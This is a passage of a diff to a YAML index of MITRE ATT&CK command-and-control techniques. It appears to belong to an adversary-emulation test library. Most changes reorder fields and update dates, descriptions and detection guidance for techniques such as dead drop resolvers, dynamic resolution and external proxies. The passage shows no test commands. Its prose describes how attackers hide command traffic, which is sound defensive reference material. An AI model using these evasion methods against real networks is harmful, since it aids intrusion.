+ They may use commonly open ports such as\n\n* TCP:80 (HTTP)\n* TCP:443 (HTTPS)\n*
+ TCP:25 (SMTP)\n* TCP/UDP:53 (DNS)\n\nThey may use the protocol associated
+ with the port or a completely different protocol. \n\nFor connections that
+ occur internally within an enclave (such as those between a proxy or pivot
+ node and other nodes), examples of common ports are \n\n* TCP/UDP:135 (RPC)\n*
+ TCP/UDP:22 (SSH)\n* TCP/UDP:3389 (RDP)"
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1043
+ url: https://attack.mitre.org/techniques/T1043
+ - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ source_name: University of Birmingham C2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ revoked: false
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ modified: '2020-07-06T17:54:28.071Z'
+ created: '2017-05-31T21:30:42.657Z'
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_network_requirements: true
+ x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
+ sending significantly more data than it receives from a server). Processes
+ utilizing the network that do not normally have network communication or have
+ never been seen before are suspicious. Analyze packet contents to detect communications
+ that do not follow the expected protocol behavior for the port that is being
+ used. (Citation: University of Birmingham C2)'
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ - Process use of network
+ - Process monitoring
+ x_mitre_version: '1.0'
+ atomic_tests: []
T1092:
technique:
id: attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef
@@ -43326,19 +44801,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2019-07-16T20:53:20.583Z'
+ modified: '2020-07-14T19:44:50.871Z'
created: '2017-05-31T21:31:09.379Z'
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - File monitoring
- - Data loss prevention
- x_mitre_detection: Monitor file access on removable media. Detect processes
- that execute when removable media is mounted.
- x_mitre_network_requirements: false
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
+ x_mitre_network_requirements: false
+ x_mitre_detection: Monitor file access on removable media. Detect processes
+ that execute when removable media is mounted.
+ x_mitre_data_sources:
+ - File monitoring
+ - Data loss prevention
+ x_mitre_version: '1.0'
atomic_tests: []
T1071.004:
technique:
@@ -43381,10 +44857,14 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-27T19:02:44.600Z'
created: '2020-03-15T16:27:31.768Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_contributors:
+ - Jan Petrov, Citi
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)
+
+ Monitor for DNS traffic to/from known-bad or suspicious domains.
x_mitre_data_sources:
- DNS records
- Netflow/Enclave netflow
@@ -43392,14 +44872,10 @@ command-and-control:
- Process use of network
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: |-
- Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)
-
- Monitor for DNS traffic to/from known-bad or suspicious domains.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Jan Petrov, Citi
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1071.004
atomic_tests:
- name: DNS Large Query Volume
@@ -43559,17 +45035,17 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-27T20:54:28.287Z'
created: '2020-03-11T14:56:34.154Z'
+ x_mitre_data_sources:
+ - DNS records
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: Detection for this technique is difficult because it would
+ require knowledge of the specific implementation of the port calculation algorithm.
+ Detection may be possible by analyzing DNS records if the algorithm is known.
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_detection: Detection for this technique is difficult because it would
- require knowledge of the specific implementation of the port calculation algorithm.
- Detection may be possible by analyzing DNS records if the algorithm is known.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - DNS records
atomic_tests: []
T1132:
technique:
@@ -43607,28 +45083,28 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-14T23:39:50.338Z'
created: '2017-05-31T21:31:43.540Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itzik Kotler, SafeBreach
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_network_requirements: true
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2)'
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Process monitoring
- - Network protocol analysis
- x_mitre_network_requirements: true
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Itzik Kotler, SafeBreach
+ x_mitre_version: '1.1'
atomic_tests: []
T1001:
technique:
@@ -43658,27 +45134,44 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-15T00:40:27.670Z'
created: '2017-05-31T21:30:18.931Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Process monitoring
- - Network protocol analysis
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2)'
- x_mitre_network_requirements: true
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
+ x_mitre_version: '1.1'
atomic_tests: []
T1102.001:
technique:
+ created: '2020-03-14T22:24:21.841Z'
+ modified: '2020-03-26T23:12:30.499Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7
+ description: |-
+ Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
+
+ Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+
+ Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
+ name: Dead Drop Resolver
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1102.001
@@ -43687,23 +45180,6 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Dead Drop Resolver
- description: |-
- Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
-
- Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
-
- Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
- id: attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-26T23:12:30.499Z'
- created: '2020-03-14T22:24:21.841Z'
x_mitre_platforms:
- Linux
- macOS
@@ -43751,23 +45227,23 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-14T23:29:19.581Z'
+ modified: '2020-06-20T20:53:20.398Z'
created: '2020-03-14T23:29:19.581Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: 'If SSL inspection is in place or the traffic is not encrypted,
+ the Host field of the HTTP header can be checked if it matches the HTTPS SNI
+ or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking
+ Resistent Communication through domain fronting 2015)'
+ x_mitre_data_sources:
+ - SSL/TLS inspection
+ - Packet capture
+ x_mitre_contributors:
+ - Matt Kelly, @breakersall
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_contributors:
- - Matt Kelly, @breakersall
- x_mitre_data_sources:
- - SSL/TLS inspection
- - Packet capture
- x_mitre_detection: 'If SSL inspection is in place or the traffic is not encrypted,
- the Host field of the HTTP header can be checked if it matches the HTTPS SNI
- or against a blacklist or whitelist of domain names. (Citation: Fifield Blocking
- Resistent Communication through domain fronting 2015)'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1568.002:
technique:
@@ -43834,31 +45310,46 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-12T14:45:22.784Z'
created: '2020-03-10T17:44:59.787Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)
x_mitre_data_sources:
- DNS records
- Netflow/Enclave netflow
- Network device logs
- Packet capture
- Process use of network
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1568:
technique:
+ created: '2020-03-10T17:28:11.747Z'
+ modified: '2020-03-27T20:54:28.560Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b
+ description: |-
+ Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
+
+ Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ name: Dynamic Resolution
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1568
@@ -43879,21 +45370,6 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Dynamic Resolution
- description: |-
- Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
-
- Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- id: attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-27T20:54:28.560Z'
- created: '2020-03-10T17:28:11.747Z'
x_mitre_platforms:
- Linux
- macOS
@@ -43921,16 +45397,12 @@ command-and-control:
atomic_tests: []
T1573:
technique:
- id: attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118
- description: Adversaries may employ a known encryption algorithm to conceal
- command and control traffic rather than relying on any inherent protections
- provided by a communication protocol. Despite the use of a secure algorithm,
- these implementations may be vulnerable to reverse engineering if secret keys
- are encoded and/or generated within malware samples/configuration files.
- name: Encrypted Channel
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2020-03-16T15:33:01.739Z'
+ modified: '2020-03-30T00:37:16.809Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1573
@@ -43947,12 +45419,16 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-30T00:37:16.809Z'
- created: '2020-03-16T15:33:01.739Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Encrypted Channel
+ description: Adversaries may employ a known encryption algorithm to conceal
+ command and control traffic rather than relying on any inherent protections
+ provided by a communication protocol. Despite the use of a secure algorithm,
+ these implementations may be vulnerable to reverse engineering if secret keys
+ are encoded and/or generated within malware samples/configuration files.
+ id: attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118
x_mitre_version: '1.0'
x_mitre_is_subtechnique: false
x_mitre_detection: |-
@@ -44013,6 +45489,21 @@ command-and-control:
name: powershell
T1090.002:
technique:
+ created: '2020-03-14T23:12:18.466Z'
+ modified: '2020-03-27T17:50:37.411Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3
+ description: |-
+ Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.
+
+ External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.
+ name: External Proxy
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1090.002
@@ -44025,21 +45516,6 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: External Proxy
- description: |-
- Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.
-
- External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.
- id: attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-27T17:50:37.411Z'
- created: '2020-03-14T23:12:18.466Z'
x_mitre_platforms:
- Linux
- macOS
@@ -44061,12 +45537,8 @@ command-and-control:
atomic_tests: []
T1008:
technique:
- id: attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Fallback Channels
- description: Adversaries may use fallback or alternate communication channels
- if the primary channel is compromised or inaccessible in order to maintain
- reliable command and control and to avoid data transfer thresholds.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1008
@@ -44075,14 +45547,19 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: Adversaries may use fallback or alternate communication channels
+ if the primary channel is compromised or inaccessible in order to maintain
+ reliable command and control and to avoid data transfer thresholds.
+ name: Fallback Channels
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2019-07-17T21:17:03.445Z'
+ modified: '2020-07-14T19:49:47.340Z'
created: '2017-05-31T21:30:21.689Z'
+ x_mitre_is_subtechnique: false
x_mitre_version: '1.0'
x_mitre_data_sources:
- Malware reverse engineering
@@ -44137,19 +45614,19 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-27T16:10:37.183Z'
created: '2020-03-11T14:11:16.560Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - DNS records
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_detection: In general, detecting usage of fast flux DNS is difficult
due to web traffic load balancing that services client requests quickly. In
single flux cases only IP addresses change for static domain names. In double
flux cases, nothing is static. Defenders such as domain registrars and service
providers are likely in the best position for detection.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_data_sources:
+ - DNS records
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1071.002:
technique:
@@ -44182,36 +45659,29 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-26T20:26:46.465Z'
created: '2020-03-15T16:16:25.763Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Network protocol analysis
- - Process monitoring
- - Process use of network
- - Netflow/Enclave netflow
- - Packet capture
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect application
layer protocols that do not follow the expected protocol for the port that
is being used.(Citation: University of Birmingham C2)'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Process monitoring
+ - Process use of network
+ - Netflow/Enclave netflow
+ - Packet capture
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1105:
technique:
- id: attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Ingress Tool Transfer
- description: Adversaries may transfer tools or other files from an external
- system into a compromised environment. Files may be copied from an external
- adversary controlled system through the command and control channel to bring
- tools into the victim network or through alternate protocols with another
- tool such as FTP. Files can also be copied over on Mac and Linux with native
- tools like scp, rsync, and sftp.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1105
@@ -44220,8 +45690,15 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: Adversaries may transfer tools or other files from an external
+ system into a compromised environment. Files may be copied from an external
+ adversary controlled system through the command and control channel to bring
+ tools into the victim network or through alternate protocols with another
+ tool such as FTP. Files can also be copied over on Mac and Linux with native
+ tools like scp, rsync, and sftp.
+ name: Ingress Tool Transfer
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -44603,24 +46080,24 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-15T00:46:26.598Z'
created: '2020-03-14T23:08:20.244Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Process use of network
- - Process monitoring
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Packet capture
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'Analyze network data for uncommon data flows between clients
that should not or often do not communicate with one another. Processes utilizing
the network that do not normally have network communication or have never
been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Packet capture
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1090.001
atomic_tests:
- name: Connection Proxy
@@ -44738,38 +46215,33 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-15T00:30:25.444Z'
created: '2020-03-15T00:30:25.444Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Process monitoring
- - Network protocol analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1071.003:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1071.003
- url: https://attack.mitre.org/techniques/T1071/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Mail Protocols
+ created: '2020-03-15T16:21:45.131Z'
+ modified: '2020-03-26T20:28:00.985Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b
description: "Adversaries may communicate using application layer protocols
associated with electronic map delivery to avoid detection/network filtering
by blending in with existing traffic. Commands to the remote system, and often
@@ -44780,13 +46252,18 @@ command-and-control:
concealed. Data could also be concealed within the email messages themselves.
An adversary may abuse these protocols to communicate with systems under their
control within a victim network while also mimicking normal, expected traffic. "
- id: attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-26T20:28:00.985Z'
- created: '2020-03-15T16:21:45.131Z'
+ name: Mail Protocols
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1071.003
+ url: https://attack.mitre.org/techniques/T1071/003
+ - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ source_name: University of Birmingham C2
x_mitre_platforms:
- Linux
- macOS
@@ -44828,26 +46305,27 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2019-06-21T14:45:42.314Z'
+ modified: '2020-07-14T19:43:38.181Z'
created: '2017-05-31T21:31:15.935Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_network_requirements: true
- x_mitre_detection: Host data that can relate unknown or suspicious process activity
- using a network connection is important to supplement any existing indicators
- of compromise based on malware command and control signatures and infrastructure.
- Relating subsequent actions that may result from Discovery of the system and
- network information or Lateral Movement to the originating process may also
- yield useful data.
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- Netflow/Enclave netflow
- Network device logs
- Network protocol analysis
- Packet capture
- Process use of network
- x_mitre_version: '1.0'
+ x_mitre_detection: Host data that can relate unknown or suspicious process activity
+ using a network connection is important to supplement any existing indicators
